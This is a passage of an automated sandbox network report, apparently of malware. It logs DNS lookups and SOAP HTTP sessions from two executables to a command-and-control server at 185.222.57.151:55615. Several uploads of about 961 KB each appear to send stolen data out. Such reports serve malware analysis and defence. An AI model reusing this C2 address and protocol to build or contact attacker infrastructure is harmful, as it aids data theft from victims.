                    Jul 27, 2024 04:12:28.790488958 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.790502071 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.790545940 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.790556908 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.790591955 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.790602922 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.790680885 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.790693045 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.790725946 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.790776968 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.790788889 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.790800095 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.790812016 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.790822983 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.790844917 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.790857077 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.790868044 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.790879965 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.790947914 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.790997028 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791008949 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791018963 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791048050 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791090012 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791104078 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791150093 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791163921 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791312933 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791325092 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791346073 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791357040 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791368008 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791428089 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791440010 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791452885 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791575909 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791588068 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791599989 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791610956 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791623116 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791635036 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791680098 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791691065 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791697979 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791728973 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791770935 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791781902 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791795969 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791923046 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791934013 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791945934 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791956902 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.791970968 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792047977 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792058945 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792069912 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792081118 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792107105 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792187929 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792198896 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792211056 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792221069 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792232990 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792237043 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792248011 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792298079 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792309999 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792320967 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792331934 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792342901 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792352915 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792438030 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792449951 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792460918 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792471886 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792490959 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792501926 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792512894 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792560101 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792572021 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792582989 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792593956 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792687893 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792700052 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792711020 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792722940 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792735100 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792746067 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792772055 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792783022 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792793989 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792805910 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792817116 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792866945 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792902946 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792915106 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792926073 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792937040 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792948008 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.792968988 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.793020964 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.793034077 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.793045998 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.793056011 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.793066978 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.793076992 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.793189049 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.793200970 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.793211937 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.793216944 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.793227911 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.793239117 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.793250084 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.793272018 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.793282986 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.793324947 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.793335915 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.793346882 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.793359995 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.793380022 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.793391943 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.793406010 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.793453932 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.793467045 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.793823004 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:28.793932915 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:29.549830914 CEST5561549718185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:29.561192036 CEST4971855615192.168.2.5185.222.57.151

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jul 27, 2024 04:12:15.072236061 CEST6324753192.168.2.51.1.1.1

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Jul 27, 2024 04:12:15.072236061 CEST192.168.2.51.1.1.10x91a1Standard query (0)api.ip.sbA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Jul 27, 2024 04:12:15.079286098 CEST1.1.1.1192.168.2.50x91a1No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • 185.222.57.151:55615

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.549706185.222.57.151556153620C:\Users\user\Desktop\RgIbrhxoEx.exe
                    TimestampBytes transferredDirectionData
                    Jul 27, 2024 04:12:08.972822905 CEST241OUTPOST / HTTP/1.1
                    Content-Type: text/xml; charset=utf-8
                    SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                    Host: 185.222.57.151:55615
                    Content-Length: 137
                    Expect: 100-continue
                    Accept-Encoding: gzip, deflate
                    Connection: Keep-Alive
                    Jul 27, 2024 04:12:09.555092096 CEST359INHTTP/1.1 200 OK
                    Content-Length: 212
                    Content-Type: text/xml; charset=utf-8
                    Server: Microsoft-HTTPAPI/2.0
                    Date: Sat, 27 Jul 2024 02:12:08 GMT
                    Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                    Jul 27, 2024 04:12:14.689630985 CEST224OUTPOST / HTTP/1.1
                    Content-Type: text/xml; charset=utf-8
                    SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                    Host: 185.222.57.151:55615
                    Content-Length: 144
                    Expect: 100-continue
                    Accept-Encoding: gzip, deflate
                    Jul 27, 2024 04:12:14.861968040 CEST25INHTTP/1.1 100 Continue
                    Jul 27, 2024 04:12:14.959398031 CEST1236INHTTP/1.1 200 OK
                    Content-Length: 11637
                    Content-Type: text/xml; charset=utf-8
                    Server: Microsoft-HTTPAPI/2.0
                    Date: Sat, 27 Jul 2024 02:12:13 GMT
                    Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>113.91.141.250</b:string><b:string>112.20.141.71</b:string><b:string>123.246.126.11</b:string><b:string>14.216.97.151</b:string><b:string>211.136.225.172</b:string><b:string>117.30.116.225</b:string><b:string>223.73.226.107</b:string><b:string>223.73.137.72</b:string><b:string>139.186.206.86</b:string><b:string>121.32.179.90</b:string><b:string>14.155.32.179</b:string><b:string>27.187.215.170</b:string><b:string>122.242.151.246</b:string><b:string>112.20.141.181</b:string><b:string>110.87.4.123</b:string><b:string>121.27.85.165</b:string><b:string>59.41.188.218</b:string><b:string>218.71.255. [TRUNCATED]


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.549708185.222.57.151556153620C:\Users\user\Desktop\RgIbrhxoEx.exe
                    TimestampBytes transferredDirectionData
                    Jul 27, 2024 04:12:18.164112091 CEST222OUTPOST / HTTP/1.1
                    Content-Type: text/xml; charset=utf-8
                    SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                    Host: 185.222.57.151:55615
                    Content-Length: 961769
                    Expect: 100-continue
                    Accept-Encoding: gzip, deflate
                    Jul 27, 2024 04:12:19.710987091 CEST294INHTTP/1.1 200 OK
                    Content-Length: 147
                    Content-Type: text/xml; charset=utf-8
                    Server: Microsoft-HTTPAPI/2.0
                    Date: Sat, 27 Jul 2024 02:12:17 GMT
                    Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.549709185.222.57.151556157448C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    TimestampBytes transferredDirectionData
                    Jul 27, 2024 04:12:18.217052937 CEST241OUTPOST / HTTP/1.1
                    Content-Type: text/xml; charset=utf-8
                    SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                    Host: 185.222.57.151:55615
                    Content-Length: 137
                    Expect: 100-continue
                    Accept-Encoding: gzip, deflate
                    Connection: Keep-Alive
                    Jul 27, 2024 04:12:18.834283113 CEST359INHTTP/1.1 200 OK
                    Content-Length: 212
                    Content-Type: text/xml; charset=utf-8
                    Server: Microsoft-HTTPAPI/2.0
                    Date: Sat, 27 Jul 2024 02:12:17 GMT
                    Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                    Jul 27, 2024 04:12:23.884210110 CEST224OUTPOST / HTTP/1.1
                    Content-Type: text/xml; charset=utf-8
                    SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                    Host: 185.222.57.151:55615
                    Content-Length: 144
                    Expect: 100-continue
                    Accept-Encoding: gzip, deflate
                    Jul 27, 2024 04:12:24.059897900 CEST25INHTTP/1.1 100 Continue
                    Jul 27, 2024 04:12:24.157140970 CEST1236INHTTP/1.1 200 OK
                    Content-Length: 11637
                    Content-Type: text/xml; charset=utf-8
                    Server: Microsoft-HTTPAPI/2.0
                    Date: Sat, 27 Jul 2024 02:12:22 GMT
                    Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>113.91.141.250</b:string><b:string>112.20.141.71</b:string><b:string>123.246.126.11</b:string><b:string>14.216.97.151</b:string><b:string>211.136.225.172</b:string><b:string>117.30.116.225</b:string><b:string>223.73.226.107</b:string><b:string>223.73.137.72</b:string><b:string>139.186.206.86</b:string><b:string>121.32.179.90</b:string><b:string>14.155.32.179</b:string><b:string>27.187.215.170</b:string><b:string>122.242.151.246</b:string><b:string>112.20.141.181</b:string><b:string>110.87.4.123</b:string><b:string>121.27.85.165</b:string><b:string>59.41.188.218</b:string><b:string>218.71.255. [TRUNCATED]


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.549711185.222.57.151556153620C:\Users\user\Desktop\RgIbrhxoEx.exe
                    TimestampBytes transferredDirectionData
                    Jul 27, 2024 04:12:19.719541073 CEST242OUTPOST / HTTP/1.1
                    Content-Type: text/xml; charset=utf-8
                    SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                    Host: 185.222.57.151:55615
                    Content-Length: 961761
                    Expect: 100-continue
                    Accept-Encoding: gzip, deflate
                    Connection: Keep-Alive
                    Jul 27, 2024 04:12:21.212205887 CEST408INHTTP/1.1 200 OK
                    Content-Length: 261
                    Content-Type: text/xml; charset=utf-8
                    Server: Microsoft-HTTPAPI/2.0
                    Date: Sat, 27 Jul 2024 02:12:19 GMT
                    Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.549718185.222.57.151556157448C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    TimestampBytes transferredDirectionData
                    Jul 27, 2024 04:12:27.258871078 CEST222OUTPOST / HTTP/1.1
                    Content-Type: text/xml; charset=utf-8
                    SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                    Host: 185.222.57.151:55615
                    Content-Length: 961280
                    Expect: 100-continue
                    Accept-Encoding: gzip, deflate
                    Jul 27, 2024 04:12:28.758013964 CEST294INHTTP/1.1 200 OK
                    Content-Length: 147
                    Content-Type: text/xml; charset=utf-8
                    Server: Microsoft-HTTPAPI/2.0
                    Date: Sat, 27 Jul 2024 02:12:26 GMT
                    Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                    Jul 27, 2024 04:12:28.761024952 CEST218OUTPOST / HTTP/1.1
                    Content-Type: text/xml; charset=utf-8
                    SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                    Host: 185.222.57.151:55615
                    Content-Length: 961272
                    Expect: 100-continue
                    Accept-Encoding: gzip, deflate
                    Jul 27, 2024 04:12:29.549830914 CEST408INHTTP/1.1 200 OK
                    Content-Length: 261
                    Content-Type: text/xml; charset=utf-8
                    Server: Microsoft-HTTPAPI/2.0
                    Date: Sat, 27 Jul 2024 02:12:28 GMT
